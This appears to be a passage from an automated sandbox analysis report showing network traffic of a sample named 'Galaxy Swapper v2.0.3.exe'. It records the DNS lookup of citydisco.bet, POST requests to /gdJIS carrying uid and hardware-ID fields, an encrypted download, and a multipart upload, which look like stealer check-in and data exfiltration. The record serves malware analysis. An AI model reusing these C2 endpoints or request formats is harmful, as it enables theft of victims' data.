Mar 13, 2025 10:19:51.030342102 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:51.030659914 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:51.030668020 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:52.794306040 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:52.794430017 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:52.795943022 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:52.795957088 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:52.796238899 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:52.797688007 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:52.797848940 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:52.797873020 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:52.797964096 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:52.797971964 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:53.650649071 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:53.650753021 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:53.650814056 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:53.650904894 CET	49684	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:53.650927067 CET	443	49684	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:54.346018076 CET	49685	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:54.346075058 CET	443	49685	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:54.346141100 CET	49685	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:54.346491098 CET	49685	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:54.346509933 CET	443	49685	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:56.210022926 CET	443	49685	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:56.210091114 CET	49685	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:56.213152885 CET	49685	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:56.213160038 CET	443	49685	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:56.213387966 CET	443	49685	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:56.214610100 CET	49685	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:56.214694977 CET	49685	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:56.214706898 CET	443	49685	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:56.934696913 CET	443	49685	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:56.934964895 CET	49685	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:57.542705059 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:57.542768002 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:57.542850018 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:57.553199053 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:57.553235054 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.324668884 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.324795008 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.326271057 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.326284885 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.326591969 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.327889919 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.328694105 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.328730106 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.328826904 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.328846931 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.328979969 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.329010010 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.329139948 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.329165936 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.329910040 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.329945087 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.330096960 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330127954 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330136061 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.330156088 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.330326080 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330348015 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.330355883 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330370903 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.330518007 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330550909 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330568075 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330573082 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.330590963 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.330714941 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330758095 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330766916 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:19:59.330769062 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:19:59.330781937 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:02.381016016 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:02.381258965 CET	443	49687	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:02.381752014 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:02.381779909 CET	49687	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:02.470659971 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:02.470706940 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:02.470793009 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:02.471163988 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:02.471173048 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.234154940 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.234271049 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:04.236953020 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:04.236972094 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.237349987 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.253153086 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:04.253182888 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:04.253309011 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.973881006 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.973983049 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.974010944 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.974023104 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:04.974037886 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.974050999 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:04.974070072 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:05.008228064 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:05.008261919 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:05.008292913 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:05.008312941 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:05.008357048 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:05.008364916 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:05.015266895 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:05.015340090 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:05.015444994 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:05.015460014 CET	443	49692	188.114.97.3	192.168.2.7
Mar 13, 2025 10:20:05.015490055 CET	49692	443	192.168.2.7	188.114.97.3
Mar 13, 2025 10:20:05.015495062 CET	443	49692	188.114.97.3	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 10:19:41.424643040 CET	57261	53	192.168.2.7	1.1.1.1
Mar 13, 2025 10:19:41.444289923 CET	53	57261	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 10:19:41.424643040 CET	192.168.2.7	1.1.1.1	0x9802	Standard query (0)	citydisco.bet	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 10:19:41.444289923 CET	1.1.1.1	192.168.2.7	0x9802	No error (0)	citydisco.bet		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 13, 2025 10:19:41.444289923 CET	1.1.1.1	192.168.2.7	0x9802	No error (0)	citydisco.bet		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

citydisco.bet

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49681	188.114.97.3	443	6516	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:19:44 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: citydisco.bet
2025-03-13 09:19:44 UTC	61	OUT	Data Raw: 75 69 64 3d 63 65 62 31 32 61 35 35 65 61 36 66 64 39 38 39 30 64 63 64 65 35 66 31 35 64 33 62 30 33 36 39 63 35 30 32 32 62 35 65 65 39 39 38 34 37 62 30 34 61 61 66 26 63 69 64 3d Data Ascii: uid=ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf&cid=
2025-03-13 09:19:45 UTC	791	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:19:45 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Fcg%2BiPNaL2AlTG4ByltJiBF%2FODz8k%2B4X2BMKkNbKPTf%2Bkt5Q%2Fu91cawjJiDC7AijJ2Efu%2FttCvPBlHoc0gKEFWxbr0CYY%2Bmk107xhi2eoR%2Bo1ZLNm9o8fH54ZwPM%2Fvr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fa738ec924434f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21439&min_rtt=20032&rtt_var=8073&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=960&delivery_rate=111192&cwnd=209&unsent_bytes=0&cid=bcbf02f64fec29ad&ts=1140&x=0"
2025-03-13 09:19:45 UTC	578	IN	Data Raw: 21 a4 53 68 ad d8 11 43 7f 7a 09 25 b2 12 71 ef 80 df 4c 76 8e 8b ae e1 a5 d6 5c 9a fe 9a 85 f0 5c 37 5e 16 40 eb af 31 b5 df 02 07 e5 0b 7d 1e cf 4f b5 4c 4f 15 2e a1 d9 da 4a a8 8e ea d8 e3 4b b6 63 15 c9 d3 64 b9 ba 6a d0 5b f3 4a ea f9 c3 e3 00 e3 32 9f e0 c3 cc 9a 7c cb eb ff f8 1a ce 56 f9 60 d0 1b a3 95 15 95 3b e5 b2 ce 63 7b 99 17 07 d1 ec cb 91 c6 64 92 b2 77 11 d9 af 55 75 41 62 8b 09 a9 90 7e 11 c6 86 7f e3 5a 8f 75 92 a8 df 83 04 e1 8a a3 70 86 87 6b a6 cd 82 b0 32 c4 f1 93 a3 22 08 9e 97 bc 0d 63 50 6d 79 49 d4 7b cd 43 a4 6a 58 d1 14 80 f7 3e 84 73 02 a3 1d 09 87 8f 8e 22 7f c6 bd fd b1 e8 89 6f 3d 09 e0 12 fc 09 8a 77 20 ff a0 b4 57 45 0f d3 36 07 4d 53 89 6c 08 89 b0 cb e9 53 a6 aa 2f 81 5d cc 1f 0b 36 90 1c 10 c3 63 5a 89 f7 39 f6 8e 5e Data Ascii: !ShCz%qLv\\7^@1}OLO.JKcdj[J2\|V`;c{dwUuAb~Zupk2"cPmyI{CjX>s"o=w WE6MSlS/]6cZ9^
2025-03-13 09:19:45 UTC	1369	IN	Data Raw: ad 7f 6f 37 0f f8 d2 52 37 b0 38 2f 0e b0 97 3e 8e c9 dc 1d 29 f3 cb 7a 07 0a 4b 55 e7 26 78 3a ca bd c0 7e e5 a5 94 f7 10 23 30 da 58 8b 4e d1 e3 43 58 cd e7 80 c7 1c d5 eb c9 d3 06 c8 24 3f d7 71 49 d2 a9 ac d2 5b 31 20 4e 92 b7 46 d2 a0 8f 41 af 14 6e e0 09 63 f3 3d 97 b7 9b 4f 71 0d 9e 1a 62 b5 7e 4d e9 23 5b a6 e1 24 9d ce 33 57 97 6c 75 93 c2 02 a5 02 dd a9 67 7a ad 51 1d 5b a1 41 26 38 0a cd 8c e7 35 dc 92 b2 b0 f8 f4 c4 93 73 b3 b4 29 cf c5 b6 79 09 40 6a 22 9e 04 0f 17 eb 0b 6a e7 5c 29 50 99 3a dd b9 f6 d3 4d 0c 5e bc 55 82 6f a6 dd 16 eb a6 aa b8 da 66 4a 3e c7 c4 ad f4 c2 18 51 ef 6e 62 bc d6 27 42 19 1f e8 24 03 53 7d 77 13 a3 8c 0c 8d 12 87 13 ba f0 39 9d c5 15 b0 fa e4 6f c1 25 13 2a 4e 96 b2 09 46 87 83 b3 a0 bc f0 a8 c6 4d 72 50 1c 73 d2 Data Ascii: o7R78/>)zKU&x:~#0XNCX$?qI[1 NFAnc=Oqb~M#[$3WlugzQ[A&85s)y@j"j\)P:M^UofJ>Qnb'B$S}w9o%*NFMrPs
2025-03-13 09:19:45 UTC	1369	IN	Data Raw: 71 a8 b4 d8 87 58 41 85 89 34 71 c1 47 af 4b 82 ed 4e d9 83 0d a7 87 7d da 43 4e 28 a6 1f 45 c3 fe fe 7c 78 b2 ec 2e 0c 4c 7d 8e 57 74 e5 aa 86 51 93 d9 f9 cd fd 86 82 33 5c ed e9 d1 3a 31 6e 59 5f f6 6f ff d4 b7 cf a0 98 62 06 5e 27 fd 00 87 44 f7 d6 c9 6e b6 92 18 35 dd 1f ec ca 81 56 a4 01 e3 e0 27 07 e4 83 37 76 03 21 0d 81 c4 8b e8 2e d1 10 d9 a3 af 74 cd 46 7a d1 da 15 aa 08 39 9c a8 c8 18 37 1e 5d fe 5a 90 d5 00 aa c2 b0 3c 97 6f bb 7b af 4c b2 cd aa 11 03 b6 6b 50 70 e6 dc 7b 0c 83 2f e6 38 db 5d 4e ef 5b e1 f2 b3 ca 34 52 93 58 e8 8f cc c8 fd 16 7e 3c ce ba 2e 5a 8a 28 e7 59 f8 db 4a 25 74 d3 8b 48 59 4a f0 5a c1 bc 99 2e 34 50 1b 9f 94 6a 5d 20 f1 a9 1f 93 c9 0e 12 7f d9 b5 a7 df 9e b4 8f f3 10 55 1e 79 39 37 44 cc 5b 51 f9 9c 5d 1b 82 2f 9e 2b Data Ascii: qXA4qGKN}CN(E\|x.L}WtQ3\:1nY_ob^'Dn5V'7v!.tFz97]Z<o{LkPp{/8]N[4RX~<.Z(YJ%tHYJZ.4Pj] Uy97D[Q]/+
2025-03-13 09:19:45 UTC	1369	IN	Data Raw: b4 b0 90 cf 8e b4 36 e9 ea ce 7d c6 71 c8 83 3e 3a fa a5 37 52 13 56 47 fc 27 91 70 98 32 85 dd ae b3 18 dc 73 92 36 0e 0c 21 36 1d 64 91 56 1b b3 78 7d 41 55 b9 36 30 ac a4 68 ff 20 34 4c aa aa 54 19 f1 28 ae 8a 43 1a e8 c7 77 1f 8e a3 4f 9c ef b9 72 ca 8b 86 27 f7 81 fb e1 cd 96 6f 98 70 9d 31 eb 35 6a 66 89 4a 7f b9 d9 e5 0c e4 b3 6e 9b 3f 7c 86 a0 af 0b 95 f2 8e 85 6e 13 88 c6 62 e9 8d a4 c9 85 e2 5d fe 40 e7 c4 96 2a 15 9f e8 2d 2b 92 62 97 9b 89 30 ea 7f 7a de bf ea 36 60 29 e7 11 34 41 86 0a ac 1d fd e1 d1 55 87 a8 11 e3 66 a0 4c 8d a9 cb 0c 78 da 5a af de f2 d8 0e 9b 74 9f fc f2 60 2e 56 76 64 c4 18 f1 b5 85 b4 2f 94 58 0b 45 c9 50 ae 84 df 8f 9e 7e 72 80 65 7f 41 96 ec 2b d6 88 6d 29 e3 a6 15 24 b4 b4 a8 af 60 37 a1 0f 6f ae 1c 24 c7 1a 10 09 77 Data Ascii: 6}q>:7RVG'p2s6!6dVx}AU60h 4LT(CwOr'op15jfJn?\|nb]@*-+b0z6`)4AUfLxZt`.Vvd/XEP~reA+m)$`7o$w
2025-03-13 09:19:45 UTC	1369	IN	Data Raw: c3 4f 4d 76 33 02 8c ec 55 3f ca 6e 8b 49 96 89 81 de ea 4f b5 72 1e 7d 0e f3 40 5d 80 73 10 9c f0 b4 22 02 5d e6 a9 1d 5d f2 4f 00 0e 78 28 ab 38 af 79 3b ae 55 6c 28 f7 7b e6 1e a4 31 00 9f a7 84 9a 76 38 22 a8 05 a7 c8 1c 23 b4 89 50 36 9b 66 6d 28 6b 94 03 f6 5e df 1b b5 20 d4 03 66 74 82 57 e2 b8 11 6d 8c e5 8e d6 ca 9a cd c0 8e 00 50 53 f9 53 19 71 c7 78 dc 19 9d fa 24 9a a6 2f 29 c3 e5 0a dd 84 89 33 53 50 0c 87 e4 71 15 8c 0a 9d 04 0b 19 8b db dd d2 77 0a 14 02 25 cf 75 6b ad b5 52 ca 02 30 2d 82 7c c2 e7 cc 09 a2 4c 66 48 15 6d 49 e0 22 8f 75 67 04 c3 38 73 a4 93 5a 5a 43 fe f2 95 cd a0 40 f9 99 2c 9f bc 1b 9d 19 bb ea 6e 2e 9e 84 39 ca dc f1 b1 2c 20 83 2a 42 ea 6b c8 76 7b c5 05 3f 62 2c 44 f3 cc 54 ed 95 04 9d 6b 61 92 83 87 65 bf 36 be c8 de Data Ascii: OMv3U?nIOr}@]s"]]Ox(8y;Ul({1v8"#P6fm(k^ ftWmPSSqx$/)3SPqw%ukR0-\|LfHmI"ug8sZZC@,n.9, *Bkv{?b,DTkae6
2025-03-13 09:19:45 UTC	1369	IN	Data Raw: 02 fb ce b0 cc d2 a7 32 69 23 e5 77 e4 39 c5 a1 33 e0 4e 5f 68 12 6a aa e3 c3 5d cf 11 7c 4f 5c 93 6e 13 bd 96 09 e6 22 d3 1c 46 6d 89 93 d5 5c 55 40 1e 1f ef e7 08 42 b2 4f ba 63 33 e4 4f c4 5a 7c 33 61 64 3b 1c c9 7c 5e eb d2 64 b7 f4 ba 13 f3 af d7 91 f5 05 85 01 07 28 79 df 32 e0 d9 39 f6 7d b5 21 6f bf df f5 83 f3 93 18 70 ff 76 0c da 8e aa 17 f2 99 00 67 dd b0 d3 4e 07 18 50 af 8b 7a 86 46 29 a0 34 f2 70 d7 83 d5 4e 78 e1 2b 21 d1 b4 50 bb 83 bc 3a 1c 5c 7a 2a 36 f7 64 2b 15 1b b1 38 e3 01 97 f9 fb a4 cd ef 38 46 8c 5b bb e3 99 75 41 45 9d dc e4 aa 89 7b b7 6c 61 d8 06 d8 ab af 7b fe 9c a7 f7 a6 ba 41 e9 63 7f e9 ce 79 18 55 f5 44 7f 49 cb d5 1c 22 44 a2 3f ba 28 b8 00 1d 58 ea 35 c2 aa 28 f8 2c de c8 70 1e 46 fd e4 f0 4b 23 dc 13 d7 2f 75 10 69 cf Data Ascii: 2i#w93N_hj]\|O\n"Fm\U@BOc3OZ\|3ad;\|^d(y29}!opvgNPzF)4pNx+!P:\z*6d+88F[uAE{la{AcyUDI"D?(X5(,pFK#/ui
2025-03-13 09:19:45 UTC	1369	IN	Data Raw: ae a3 34 7d fb 02 4c 8c 13 0f 63 ec b8 63 f5 f0 d2 31 f0 e9 ab 5a 9a f7 e2 11 c4 96 7a 67 31 42 26 7e 14 e5 60 2d fa b1 2c b8 fe 8a 98 07 32 6d 48 3a 18 49 87 2a a4 bb 75 82 6a e8 88 1f f0 29 82 e5 6f cc 50 86 89 bb f7 69 ca 6b 80 c3 f1 68 15 5b 61 68 77 d2 5a a6 0e 23 4a 78 23 63 b2 c9 82 b3 76 6b d1 a3 c9 33 82 03 5b 6f 29 4b de 83 f0 74 8a fc b1 72 0e db 30 92 66 07 cc 70 6a cc 80 4c b7 29 9f b4 85 d6 06 75 3f a4 d0 30 d3 db 7d 1a 37 59 24 dd 1f 46 4b f6 37 fe 2d f0 05 a6 05 53 99 38 62 05 ce 2b bc 19 40 cb 71 97 a5 44 03 4c d8 4f ea 11 8a f4 d7 e0 da ad 05 55 02 52 8e 2e da 1f 2d 32 92 b7 79 26 7e f3 67 aa 44 a7 28 4d 20 05 50 72 56 34 f5 02 c9 b1 e0 78 f1 77 39 a2 40 b6 0e f5 2e 20 f4 f7 60 c1 71 a0 d7 66 f0 c6 a0 53 da de ec 57 10 d1 80 d3 a3 e4 ea Data Ascii: 4}Lcc1Zzg1B&~`-,2mH:I*uj)oPikh[ahwZ#Jx#cvk3[o)Ktr0fpjL)u?0}7Y$FK7-S8b+@qDLOUR.-2y&~gD(M PrV4xw9@. `qfSW
2025-03-13 09:19:45 UTC	1369	IN	Data Raw: 3b fd 1a 2b 1f 26 52 01 88 02 0c af 75 fd c6 ae 56 3c 09 c5 da 3b 29 7f ad cf 07 3d 5a a4 2d 38 db f9 06 34 2f d8 03 7d 8e 1e ac c0 91 d9 0e 60 a7 ec 1d 92 a8 e9 79 ce 5b 91 14 7c 2a 86 c9 41 09 f6 b8 b1 ab d6 2e 8e 43 9d 2a 6b 30 ff 2a b2 02 59 4a f7 0e 64 79 38 b5 82 d6 c6 86 26 e1 c0 3c 94 f5 cd 3e 52 bb e2 89 26 05 b8 2c 3d 8f 61 7e 52 8b 69 69 e8 3a 82 de 48 f9 d0 13 59 71 fe 07 43 4c 35 34 a3 8f 86 6c 88 23 7d c5 3b 54 d5 76 88 47 26 54 12 f4 21 86 05 d1 04 c6 b3 ab 8a a1 a6 ab 8b 4f 6e c3 c8 90 e7 18 f2 74 6f 8f 51 c1 9a 43 1c a5 39 e6 65 4b b0 52 7b d7 41 be 2f 15 75 4b 19 3e ed 9b aa f5 36 db 70 b3 e8 20 42 ef df 7c 6c 83 6c fe e2 22 f4 01 2c 63 d9 34 70 d8 7f 43 7a 18 2f 92 dc 63 f7 96 4f 29 1d 0d 94 52 c4 e3 2e 3d c4 39 28 a0 6b bc b8 dc fd 95 Data Ascii: ;+&RuV<;)=Z-84/}`y[\|A.Ck0*YJdy8&<>R&,=a~Rii:HYqCL54l#};TvG&T!OntoQC9eKR{A/uK>6p B\|ll",c4pCz/cO)R.=9(k
2025-03-13 09:19:45 UTC	1369	IN	Data Raw: a5 71 8f 97 a7 4d 3f 0c 9a a5 5c 77 45 1f a8 d4 c4 a5 b6 99 7f 19 a0 8f 88 09 59 ae 23 b6 b0 24 fb 35 c8 e3 b8 9c 9b 6c ae 73 e6 c4 6e 84 43 d9 71 73 f6 3a b2 b4 92 e6 40 f6 ad a2 e0 d7 97 63 12 3e f5 a6 fa 5b 28 10 55 fc 3c 5b 21 06 db 3d 12 5f 32 e2 42 a9 19 28 73 f0 b1 cc d7 86 cb b0 2d 20 0e 4b 87 91 fe a6 2d 36 89 c3 ca 86 06 09 96 c6 29 76 d7 5f dd ac 69 32 88 3e e2 10 07 b3 b5 92 80 b2 55 c2 3d 27 b9 a9 dc 7f c2 ea 7f 76 38 0d a7 3d 9c 3b 17 af cc 4e f9 01 d1 80 84 ea f1 2d d2 ee 97 bf dc 0f 87 48 28 d8 c7 4c a8 81 39 ce 59 04 5b c2 5d 3c 1d 71 23 96 44 8c 1c ba 4e 11 6f cf b3 28 04 c7 67 11 f4 d1 09 b2 7e ef a0 f7 71 16 70 f3 54 04 8b b4 13 4b e8 32 37 a8 ae 32 0c f1 a2 92 a2 90 1c 16 6b 9b fc 92 75 ed 91 fe 69 20 d5 3b d3 43 69 b5 4d 15 e1 67 77 Data Ascii: qM?\wEY#$5lsnCqs:@c>[(U<[!=_2B(s- K-6)v_i2>U='v8=;N-H(L9Y[]<q#DNo(g~qpTK272kui ;CiMgw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49682	188.114.97.3	443	6516	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:19:47 UTC	276	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Zk832623L2s30 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14493 Host: citydisco.bet
2025-03-13 09:19:47 UTC	14493	OUT	Data Raw: 2d 2d 5a 6b 38 33 32 36 32 33 4c 32 73 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 65 62 31 32 61 35 35 65 61 36 66 64 39 38 39 30 64 63 64 65 35 66 31 35 64 33 62 30 33 36 39 63 35 30 32 32 62 35 65 65 39 39 38 34 37 62 30 34 61 61 66 0d 0a 2d 2d 5a 6b 38 33 32 36 32 33 4c 32 73 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 6b 38 33 32 36 32 33 4c 32 73 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 36 31 35 46 46 46 Data Ascii: --Zk832623L2s30Content-Disposition: form-data; name="uid"ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf--Zk832623L2s30Content-Disposition: form-data; name="pid"2--Zk832623L2s30Content-Disposition: form-data; name="hwid"43615FFF
2025-03-13 09:19:48 UTC	809	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:19:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WHqMJFrDpynBHQQyA4NYQGwC%2Bw%2BRVAqdVRImkySNJR1RAGeLjFNhJ4vnfxEkDfEYXIrsjaWWVdn76BGiyPn3C07NQsyYWP604QMGPAm19C2j6YXyBrDuzewxtlKYq%2Bp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fa73a2b9447281-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=26277&min_rtt=24089&rtt_var=10569&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2831&recv_bytes=15427&delivery_rate=86626&cwnd=248&unsent_bytes=0&cid=a5a612c8ead17ca4&ts=863&x=0"
2025-03-13 09:19:48 UTC	75	IN	Data Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 33 2e 31 33 35 2e 32 31 39 22 7d 7d 0d 0a Data Ascii: 45{"success":{"message":"message success delivery from 73.13.135.219"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
